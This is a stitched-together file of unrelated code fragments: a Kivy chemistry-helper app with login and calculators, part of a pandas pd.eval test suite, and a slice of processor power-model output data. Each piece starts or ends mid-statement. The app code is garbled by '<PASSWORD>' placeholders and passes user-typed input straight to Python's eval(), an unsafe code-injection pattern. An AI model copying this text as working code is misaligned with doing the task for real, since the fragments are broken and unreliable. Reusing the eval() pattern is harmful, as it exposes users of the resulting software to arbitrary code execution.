def process_message(messages: str, key=True):
returned_message = ""
if key:
messages = messages.split("_")
for index, message in enumerate(messages):
if len(messages) - 1 != index:
returned_message += message.capitalize() + "\n"
else:
returned_message += message.capitalize()
else:
for index, message, in enumerate(messages):
message = str(message)
if index % 2 == 0:
returned_message += "\n"
returned_message += message + ", "
print(message)
returned_message = returned_message.rstrip(", ")
return returned_message
# All of the fonts
Cabin_Sketch_Dir = "Fonts/Cabin_Sketch/"
Open_Sans_Dir = "Fonts/Open_Sans/"
LabelBase.register(name="Cabin Sketch", fn_regular=f"{Cabin_Sketch_Dir}CabinSketch-Regular.ttf")
LabelBase.register(name="Open Sans Light", fn_regular=f"{Open_Sans_Dir}OpenSans-Light.ttf")
LabelBase.register(name="Open Sans", fn_regular=f"{Open_Sans_Dir}OpenSans-Regular.ttf",
fn_bold=f"{Open_Sans_Dir}OpenSans-ExtraBold.ttf")
kv = Builder.load_file("kv/main.kv")
class MainApp(App):
error_messages = ["INVALID_EMAIL", "INVALID_PASSWORD", "WEAK_PASSWORD : Password should be at least 6 <PASSWORD>",
"EMAIL_EXISTS", "EMAIL_NOT_FOUND"]
can_change_screen = True
screen_manager = "screen_manager"
forgot_password_popup = None
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.local_id = None
self.SUB = str.maketrans("0123456789", "₀₁₂₃₄₅₆₇₈₉")
self.SUP = str.maketrans("0123456789", "⁰¹²³⁴⁵⁶⁷⁸⁹")
def build(self):
Window.size = (1080, 2050) # 1080, 2050
return kv
# changes the current screen to another screen if a button was pressed.
def change_screen(self, screen_name):
screen_manager = self.root.ids["screen_manager"]
screen_manager.transition = NoTransition()
try:
error_text = self.root.ids[screen_name].ids["error_text"]
error_text.text = ""
except Exception as e:
print("No text available")
if screen_manager.current == "signup_student":
self.sign_up_for_students()
if self.can_change_screen:
screen_manager.current = screen_name
print(screen_manager.current)
def back_button(self, screen_name, change_screen: bool):
screen_manager = self.root.ids["screen_manager"]
screen_manager.transition = NoTransition()
if change_screen:
screen_manager.current = screen_name
self.can_change_screen = True
print(screen_manager.current)
# Popup window method
def show_popup(self):
self.forgot_password_popup = ForgotPassword()
popup_window = Popup(title="Chem Hero", content=self.forgot_password_popup,
size_hint=(0.8333333333333334, 0.43902439024390244))
popup_window.open()
# student sign up
def sign_up_for_students(self):
sign_up_student_screen = self.root.ids["signup_student"]
email = sign_up_student_screen.ids["student_email_signup"]
password = <PASSWORD>_up_student_screen.ids["<PASSWORD>"]
name = sign_up_student_screen.ids["name"]
dob = sign_up_student_screen.ids["DOB"]
username = sign_up_student_screen.ids["username"]
error_text = sign_up_student_screen.ids["error_text"]
# the authentication process
auth = Authentication()
local_id = auth.signup(email.text, password.text)
if email.text == "" or password.text == "" or name.text == "" or dob == "" or username == "":
error_text.text = "Missing Inputs"
self.can_change_screen = False
elif local_id in self.error_messages:
error_text.text = process_error_message(local_id)
self.can_change_screen = False
else:
# the data
data = {"Occupation": "Student", "name": name.text,
"Date of Birth": dob.text, "Username": username.text,
"Email": email.text}
# the database storing process
database = Database.db
database.child("Users").child(local_id).set(data)
email.text = ""
password.text = ""
self.can_change_screen = True
# method used to sign in
def sign_in(self):
login_screen = self.root.ids["login_screen"]
email = login_screen.ids["email_text"]
password = login_screen.ids["password_text"]
error_text = login_screen.ids["error_text"]
auth = Authentication()
ids = auth.sign_in(email.text, password.text)
self.local_id = ids[0]
if email.text == "" or password.text == "":
error_text.text = "Missing Inputs"
email.text = ""
password.text = ""
elif self.local_id in self.error_messages:
if self.local_id == "EMAIL_NOT_FOUND":
error_text.text = "Incorrect Inputs"
else:
error_text.text = process_error_message(self.local_id)
email.text = ""
password.text = ""
else:
database = Database.db
error_text.text = ""
email.text = ""
password.text = ""
home_page = ""
id_token = ids[1]
user_data = auth.get_user_data(id_token)
email_verified = Authentication.check_email_verified(user_data)
if email_verified:
occupation = Database.get_occupation(database, self.local_id, "Occupation", "Users")
if occupation == "Student":
home_page = "home_page_student"
#self.initial_settings("student")
elif occupation == "Teacher":
home_page = "home_page_teacher"
#self.initial_settings("teacher")
self.change_screen(home_page)
else:
error_text.text = "Email not Verified"
# sends a email link to reset password
def send_email_to_reset_password(self):
email = self.forgot_password_popup.ids["email"]
error_text = self.forgot_password_popup.ids["error_text"]
auth = Authentication()
request = auth.reset_password(email.text)
data = json.loads(request.content.decode())
if not request.ok:
error_message = data["error"]["message"]
error_message = process_error_message(error_message)
error_text.text = error_message
else:
self.forgot_password_popup.clear_widgets()
self.forgot_password_popup.add_widget(Label(text="A link has been sent your E-mail", size_hint=(1, 0.1),
pos_hint={"center_x": 0.5, "center_y": 0.5},
font_name="Open Sans", font_size="16dp"))
email.text = ""
# show the properties of the elements
def show_element_property(self):
homepage_student = self.root.ids["search_element"]
scroll_view_gridlayout = homepage_student.ids["searching_table"] # the gridlayout
search_text = homepage_student.ids["search_text"] # the input box
dictionary_of_elements = elements.get_elements()
dict_of_symbols = elements.symbol_element_name_key_pair()
scroll_view_gridlayout.clear_widgets()
print(dictionary_of_elements)
print(dict_of_symbols)
# TODO make the information more viewable
if search_text.text.capitalize() in dictionary_of_elements:
element = dictionary_of_elements[search_text.text.capitalize()]
for key, value in element.items():
if key in ["source", "spectral_img", "xpos", "ypos", "shells", "summary", "ionization_energies",
"appearance", "electron_configuration"]:
continue
if key == "density":
value = f"{value} g/L"
if isinstance(value, str) and key != "discovered_by" and key != "named_by":
value = value.capitalize()
scroll_view_gridlayout.add_widget(Label(text=str(process_message(key)), color=(0, 0, 0, 1)))
scroll_view_gridlayout.add_widget(Label(text=str(value), color=(0, 0, 0, 1)))
elif search_text.text.capitalize() in dict_of_symbols:
element = dict_of_symbols[search_text.text.capitalize()]
element_information = dictionary_of_elements[element]
for key, value in element_information.items():
if key in ["source", "spectral_img", "xpos", "ypos", "shells", "summary", "ionization_energies",
"appearance", "electron_configuration"]:
continue
if isinstance(value, str) and key != "discovered_by" and key != "named_by":
value = value.capitalize()
if key == "density":
value = f"{value} g/L"
scroll_view_gridlayout.add_widget(Label(text=str(process_message(key)), color=(0, 0, 0, 1)))
scroll_view_gridlayout.add_widget(Label(text=str(value), color=(0, 0, 0, 1)))
elif search_text.text == "":
pass
else:
scroll_view_gridlayout.add_widget(Label(text="Invalid Search",
font_name="Open Sans",
font_size="26dp",
color=(0, 0, 0, 1)))
# calculate the molar mass
def calculate_molar_mass(self):
home_page_student = self.root.ids["molar_calculator"]
scroll_calculation_text = home_page_student.ids["calculation_text"]
chemical_formula_text = home_page_student.ids["chemical_formula_text"]
molar_mass = elements.MolarMass(chemical_formula_text.text)
if molar_mass.molar_mass <= 0:
answer = f"Compound [b]{chemical_formula_text.text}[/b] is invalid"
scroll_calculation_text.text = answer
else:
answer = f"[b]Compound[/b]: {molar_mass}\n[b]Element Frequency[/b]: \n"
print(molar_mass)
for element, frequency in molar_mass.element_frequencies.items():
answer += f"{element}: {frequency} \n"
answer += "\n[b]Relative Masses and Percent[/b]:\n"
for element, information in molar_mass.element_composition.items():
answer += f"[u]Total mass of {element}[/u]: {information[0]} g\n"
answer += f"[u]Percent composition of {element}[/u]: " \
f"{round(information[1] * 100, 1)}%\n\n"
answer += f"[b]Total mass[/b]: {molar_mass.molar_mass} g"
scroll_calculation_text.text = answer + "\n\n\n"
scroll_calculation_text.text += "[b]Calculations[/b]\n" + molar_mass.show_calculation()
# calculate empirical or molecular formula base off of percent composition and abundance
def calculate_formula(self):
# TODO take in formula names and symbol
home_page_screen = self.root.ids["calculate_formula"]
element_list_text = home_page_screen.ids["element_list_text"]
percent_list_text = home_page_screen.ids["percent_list_text"]
mass = home_page_screen.ids["mass"]
calculate_formula_scroll_view = home_page_screen.ids["calculate_formula_scroll_view"]
calculate_formula_scroll_view.text = ""
percentage_contains_string = False
there_is_mass = False
try:
if isinstance(eval(mass), int) or isinstance(eval(mass), float): # if the mass is actually a number
there_is_mass = True
except:
there_is_mass = False
element_list = element_list_text.text.replace(" ", "").split(",")
init_percent_list = percent_list_text.text.replace(" ", "").split(",")
term_percent_list = []
if element_list_text.text == "" or percent_list_text.text == "":
calculate_formula_scroll_view.text = "Missing Inputs"
elif len(init_percent_list) > 0:
for percent in init_percent_list:
try:
if percent[-1] == "%":
percent = float(percent.strip("%")) / 100
term_percent_list.append(percent)
elif isinstance(eval(percent), float) or isinstance(eval(percent), int):
term_percent_list.append(eval(percent))
else:
calculate_formula_scroll_view.text = "Invalid Percentage Values."
break
except:
percentage_contains_string = True
break
if percentage_contains_string:
calculate_formula_scroll_view.text = "Percentage Values contains characters."
elif sum(term_percent_list) != 1:
calculate_formula_scroll_view.text = "Given percentages does not add up to 100%."
else:
if there_is_mass:
percent_comp_obj = elements.PercentComp(element_list, term_percent_list, eval(mass))
empirical_formula = percent_comp_obj.empirical_formula_markup
molecular_formula = elements.MolarMass(percent_comp_obj.molecular_formula)
moles = percent_comp_obj.empirical_formula[1]
for element, mole in moles.items():
calculate_formula_scroll_view.text += f"The molecule contains {round(mole)} moles of {element}\n"
calculate_formula_scroll_view.text += f"The empirical formula would be: {empirical_formula}"
calculate_formula_scroll_view.text += f"The molecular formula would be: {molecular_formula}"
else:
percent_comp_obj = elements.PercentComp(element_list, term_percent_list)
empirical_formula = percent_comp_obj.empirical_formula_markup
moles = percent_comp_obj.empirical_formula[1]
for element, mole in moles.items():
calculate_formula_scroll_view.text += f"The molecule contains {round(mole)} moles of {element}\n"
calculate_formula_scroll_view.text += f"The empirical formula would be: {empirical_formula}"
else:
calculate_formula_scroll_view.text = "No percentages are given."
# balance a equation
def balance_equation(self):
homepage = self.root.ids["balancing_equations"]
reactant_list = homepage.ids["reactant_list"].text
product_list = homepage.ids["product_list"].text
scroll_view_text = homepage.ids["balance_equation_scroll_view"]
# Check if the entries are valid
reactants = reactant_list.replace(" ", "").split(",")
products = product_list.replace(" ", "").split(",")
invalid = False
for reactant in reactants:
molar_mass = elements.MolarMass(reactant)
if molar_mass.molar_mass <= 0:
invalid = True
break
for product in products:
if invalid:
break
else:
molar_mass2 = elements.MolarMass(product)
if molar_mass2.molar_mass <= 0:
invalid = True
break
print(reactants, products)
if reactants[0] == "" or products[0] == "":
scroll_view_text.text = f"Missing Inputs"
elif invalid:
scroll_view_text.text = f"Invalid Input"
else:
balanced_equation = elements.EquationBalance(reactant_list, product_list)
scroll_view_text.text = f"The balanced equation is {balanced_equation.balance_equation()}"
# method to update user setting
def initial_settings(self, occupation: str):
homepage = self.root.ids["home_page_student"]
if occupation == "student":
name = homepage.ids["name"]
dob = homepage.ids["DOB"]
username = homepage.ids["username"]
email = homepage.ids["email"]
status = homepage.ids["status"]
name.text = Database.get_occupation(Database.db, local_id=self.local_id, key="name", folder="Users")
dob.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Date of Birth", folder="Users")
username.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Username", folder="Users")
email.text = Database.get_occupation(Database.db, local_id=self.local_id, key="Email", folder="Users")
status.text = Database.get_occupation(Database.db, | |
parser=parser)
tm.assert_frame_equal(res, df < 2)
df3 = DataFrame(np.random.randn(*df.shape), index=df.index, columns=df.columns)
res = pd.eval("df < df3", engine=engine, parser=parser)
tm.assert_frame_equal(res, df < df3)
@pytest.mark.parametrize("r1", lhs_index_types)
@pytest.mark.parametrize("c1", index_types)
@pytest.mark.parametrize("r2", index_types)
@pytest.mark.parametrize("c2", index_types)
def test_medium_complex_frame_alignment(self, engine, parser, r1, c1, r2, c2):
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
df = tm.makeCustomDataframe(
3, 2, data_gen_f=f, r_idx_type=r1, c_idx_type=c1
)
df2 = tm.makeCustomDataframe(
4, 2, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
df3 = tm.makeCustomDataframe(
5, 2, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
if should_warn(df.index, df2.index, df3.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df + df2 + df3", engine=engine, parser=parser)
else:
res = pd.eval("df + df2 + df3", engine=engine, parser=parser)
tm.assert_frame_equal(res, df + df2 + df3)
@pytest.mark.parametrize("index_name", ["index", "columns"])
@pytest.mark.parametrize("c_idx_type", index_types)
@pytest.mark.parametrize("r_idx_type", lhs_index_types)
def test_basic_frame_series_alignment(
self, engine, parser, index_name, r_idx_type, c_idx_type
):
def testit(r_idx_type, c_idx_type, index_name):
df = tm.makeCustomDataframe(
10, 10, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
if should_warn(df.index, s.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df + s", engine=engine, parser=parser)
else:
res = pd.eval("df + s", engine=engine, parser=parser)
if r_idx_type == "dt" or c_idx_type == "dt":
expected = df.add(s) if engine == "numexpr" else df + s
else:
expected = df + s
tm.assert_frame_equal(res, expected)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
testit(r_idx_type, c_idx_type, index_name)
@pytest.mark.parametrize("index_name", ["index", "columns"])
def test_basic_series_frame_alignment(self, engine, parser, index_name):
def testit(r_idx_type, c_idx_type, index_name):
df = tm.makeCustomDataframe(
10, 7, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
if should_warn(s.index, df.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("s + df", engine=engine, parser=parser)
else:
res = pd.eval("s + df", engine=engine, parser=parser)
if r_idx_type == "dt" or c_idx_type == "dt":
expected = df.add(s) if engine == "numexpr" else s + df
else:
expected = s + df
tm.assert_frame_equal(res, expected)
# only test dt with dt, otherwise weird joins result
args = product(["i", "u", "s"], ["i", "u", "s"])
with warnings.catch_warnings(record=True):
# avoid warning about comparing strings and ints
warnings.simplefilter("ignore", RuntimeWarning)
for r_idx_type, c_idx_type in args:
testit(r_idx_type, c_idx_type, index_name)
# dt with dt
args = product(["dt"], ["dt"])
with warnings.catch_warnings(record=True):
# avoid warning about comparing strings and ints
warnings.simplefilter("ignore", RuntimeWarning)
for r_idx_type, c_idx_type in args:
testit(r_idx_type, c_idx_type, index_name)
@pytest.mark.parametrize("c_idx_type", index_types)
@pytest.mark.parametrize("r_idx_type", lhs_index_types)
@pytest.mark.parametrize("index_name", ["index", "columns"])
@pytest.mark.parametrize("op", ["+", "*"])
def test_series_frame_commutativity(
self, engine, parser, index_name, op, r_idx_type, c_idx_type
):
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
df = tm.makeCustomDataframe(
10, 10, data_gen_f=f, r_idx_type=r_idx_type, c_idx_type=c_idx_type
)
index = getattr(df, index_name)
s = Series(np.random.randn(5), index[:5])
lhs = f"s {op} df"
rhs = f"df {op} s"
if should_warn(df.index, s.index):
with tm.assert_produces_warning(RuntimeWarning):
a = pd.eval(lhs, engine=engine, parser=parser)
with tm.assert_produces_warning(RuntimeWarning):
b = pd.eval(rhs, engine=engine, parser=parser)
else:
a = pd.eval(lhs, engine=engine, parser=parser)
b = pd.eval(rhs, engine=engine, parser=parser)
if r_idx_type != "dt" and c_idx_type != "dt":
if engine == "numexpr":
tm.assert_frame_equal(a, b)
@pytest.mark.parametrize("r1", lhs_index_types)
@pytest.mark.parametrize("c1", index_types)
@pytest.mark.parametrize("r2", index_types)
@pytest.mark.parametrize("c2", index_types)
def test_complex_series_frame_alignment(self, engine, parser, r1, c1, r2, c2):
import random
n = 3
m1 = 5
m2 = 2 * m1
with warnings.catch_warnings(record=True):
warnings.simplefilter("always", RuntimeWarning)
index_name = random.choice(["index", "columns"])
obj_name = random.choice(["df", "df2"])
df = tm.makeCustomDataframe(
m1, n, data_gen_f=f, r_idx_type=r1, c_idx_type=c1
)
df2 = tm.makeCustomDataframe(
m2, n, data_gen_f=f, r_idx_type=r2, c_idx_type=c2
)
index = getattr(locals().get(obj_name), index_name)
ser = Series(np.random.randn(n), index[:n])
if r2 == "dt" or c2 == "dt":
if engine == "numexpr":
expected2 = df2.add(ser)
else:
expected2 = df2 + ser
else:
expected2 = df2 + ser
if r1 == "dt" or c1 == "dt":
if engine == "numexpr":
expected = expected2.add(df)
else:
expected = expected2 + df
else:
expected = expected2 + df
if should_warn(df2.index, ser.index, df.index):
with tm.assert_produces_warning(RuntimeWarning):
res = pd.eval("df2 + ser + df", engine=engine, parser=parser)
else:
res = pd.eval("df2 + ser + df", engine=engine, parser=parser)
assert res.shape == expected.shape
tm.assert_frame_equal(res, expected)
def test_performance_warning_for_poor_alignment(self, engine, parser):
df = DataFrame(np.random.randn(1000, 10))
s = Series(np.random.randn(10000))
if engine == "numexpr":
seen = PerformanceWarning
else:
seen = False
with tm.assert_produces_warning(seen):
pd.eval("df + s", engine=engine, parser=parser)
s = Series(np.random.randn(1000))
with tm.assert_produces_warning(False):
pd.eval("df + s", engine=engine, parser=parser)
df = DataFrame(np.random.randn(10, 10000))
s = Series(np.random.randn(10000))
with tm.assert_produces_warning(False):
pd.eval("df + s", engine=engine, parser=parser)
df = DataFrame(np.random.randn(10, 10))
s = Series(np.random.randn(10000))
is_python_engine = engine == "python"
if not is_python_engine:
wrn = PerformanceWarning
else:
wrn = False
with tm.assert_produces_warning(wrn) as w:
pd.eval("df + s", engine=engine, parser=parser)
if not is_python_engine:
assert len(w) == 1
msg = str(w[0].message)
logged = np.log10(s.size - df.shape[1])
expected = (
f"Alignment difference on axis 1 is larger "
f"than an order of magnitude on term 'df', "
f"by more than {logged:.4g}; performance may suffer"
)
assert msg == expected
# ------------------------------------
# Slightly more complex ops
@td.skip_if_no_ne
class TestOperationsNumExprPandas:
exclude_arith: list[str] = []
engine = "numexpr"
parser = "pandas"
@classmethod
def setup_class(cls):
cls.arith_ops = [
op
for op in expr.ARITH_OPS_SYMS + expr.CMP_OPS_SYMS
if op not in cls.exclude_arith
]
def eval(self, *args, **kwargs):
kwargs["engine"] = self.engine
kwargs["parser"] = self.parser
kwargs["level"] = kwargs.pop("level", 0) + 1
return pd.eval(*args, **kwargs)
def test_simple_arith_ops(self):
ops = (op for op in self.arith_ops if op != "//")
for op in ops:
ex = f"1 {op} 1"
ex2 = f"x {op} 1"
ex3 = f"1 {op} (x + 1)"
if op in ("in", "not in"):
msg = "argument of type 'int' is not iterable"
with pytest.raises(TypeError, match=msg):
pd.eval(ex, engine=self.engine, parser=self.parser)
else:
expec = _eval_single_bin(1, op, 1, self.engine)
x = self.eval(ex, engine=self.engine, parser=self.parser)
assert x == expec
expec = _eval_single_bin(x, op, 1, self.engine)
y = self.eval(
ex2, local_dict={"x": x}, engine=self.engine, parser=self.parser
)
assert y == expec
expec = _eval_single_bin(1, op, x + 1, self.engine)
y = self.eval(
ex3, local_dict={"x": x}, engine=self.engine, parser=self.parser
)
assert y == expec
@pytest.mark.parametrize("rhs", [True, False])
@pytest.mark.parametrize("lhs", [True, False])
@pytest.mark.parametrize("op", expr.BOOL_OPS_SYMS)
def test_simple_bool_ops(self, rhs, lhs, op):
ex = f"{lhs} {op} {rhs}"
res = self.eval(ex)
exp = eval(ex)
assert res == exp
@pytest.mark.parametrize("rhs", [True, False])
@pytest.mark.parametrize("lhs", [True, False])
@pytest.mark.parametrize("op", expr.BOOL_OPS_SYMS)
def test_bool_ops_with_constants(self, rhs, lhs, op):
ex = f"{lhs} {op} {rhs}"
res = self.eval(ex)
exp = eval(ex)
assert res == exp
def test_4d_ndarray_fails(self):
x = np.random.randn(3, 4, 5, 6)
y = Series(np.random.randn(10))
msg = "N-dimensional objects, where N > 2, are not supported with eval"
with pytest.raises(NotImplementedError, match=msg):
self.eval("x + y", local_dict={"x": x, "y": y})
def test_constant(self):
x = self.eval("1")
assert x == 1
def test_single_variable(self):
df = DataFrame(np.random.randn(10, 2))
df2 = self.eval("df", local_dict={"df": df})
tm.assert_frame_equal(df, df2)
def test_truediv(self):
s = np.array([1])
ex = "s / 1"
d = {"s": s} # noqa
# FutureWarning: The `truediv` parameter in pd.eval is deprecated and will be
# removed in a future version.
with tm.assert_produces_warning(FutureWarning):
res = self.eval(ex, truediv=False)
tm.assert_numpy_array_equal(res, np.array([1.0]))
with tm.assert_produces_warning(FutureWarning):
res = self.eval(ex, truediv=True)
tm.assert_numpy_array_equal(res, np.array([1.0]))
with tm.assert_produces_warning(FutureWarning):
res = self.eval("1 / 2", truediv=True)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("1 / 2", truediv=False)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("s / 2", truediv=False)
expec = 0.5
assert res == expec
with tm.assert_produces_warning(FutureWarning):
res = self.eval("s / 2", truediv=True)
expec = 0.5
assert res == expec
def test_failing_subscript_with_name_error(self):
df = DataFrame(np.random.randn(5, 3)) # noqa
with pytest.raises(NameError, match="name 'x' is not defined"):
self.eval("df[x > 2] > 2")
def test_lhs_expression_subscript(self):
df = DataFrame(np.random.randn(5, 3))
result = self.eval("(df + 1)[df > 2]", local_dict={"df": df})
expected = (df + 1)[df > 2]
tm.assert_frame_equal(result, expected)
def test_attr_expression(self):
df = DataFrame(np.random.randn(5, 3), columns=list("abc"))
expr1 = "df.a < df.b"
expec1 = df.a < df.b
expr2 = "df.a + df.b + df.c"
expec2 = df.a + df.b + df.c
expr3 = "df.a + df.b + df.c[df.b < 0]"
expec3 = df.a + df.b + df.c[df.b < 0]
exprs = expr1, expr2, expr3
expecs = expec1, expec2, expec3
for e, expec in zip(exprs, expecs):
tm.assert_series_equal(expec, self.eval(e, local_dict={"df": df}))
def test_assignment_fails(self):
df = DataFrame(np.random.randn(5, 3), columns=list("abc"))
df2 = DataFrame(np.random.randn(5, 3))
expr1 = "df = df2"
msg = "cannot assign without a target object"
with pytest.raises(ValueError, match=msg):
self.eval(expr1, local_dict={"df": df, "df2": df2})
def test_assignment_column(self):
df = DataFrame(np.random.randn(5, 2), columns=list("ab"))
orig_df = df.copy()
# multiple assignees
with pytest.raises(SyntaxError, match="invalid syntax"):
df.eval("d c = a + b")
# invalid assignees
msg = "left hand side of an assignment must be a single name"
with | |
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228261,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76856,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281163,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.141922,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199365,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21299,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731154,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540733,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Runtime Dynamic': 0.0613848,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111386,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291762,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55861,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0021177,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
